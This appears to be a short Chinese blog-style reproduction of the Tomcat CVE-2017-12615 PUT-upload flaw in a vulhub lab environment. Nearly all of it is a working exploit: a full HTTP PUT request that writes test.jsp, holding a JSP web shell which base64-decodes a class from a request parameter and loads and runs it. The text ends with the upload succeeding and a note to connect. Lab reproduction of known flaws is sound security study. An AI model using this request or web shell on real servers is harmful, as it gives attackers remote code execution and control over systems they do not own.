vulhub tomcat CVE-2017-12615 漏洞复现

Tomcat版本:8.5.19

直接利用PUT方法写入shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
PUT /test.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1058

<%!
class PRIORITY extends ClassLoader{
PRIORITY(ClassLoader c){super(c);}
public Class expendable(byte[] b){
return super.defineClass(b, 0, b.length);
}
}
public byte[] interrupt(String str) throws Exception {
Class base64;
byte[] value = null;
try {
base64=Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
} catch (Exception e) {
try {
base64=Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
} catch (Exception ee) {}
}
return value;
}
%>
<%
String cls = request.getParameter("umwJUlXB");
if (cls != null) {
new PRIORITY(this.getClass().getClassLoader()).expendable(interrupt(cls)).newInstance().equals(request);
}
%>

成功上传

直接连接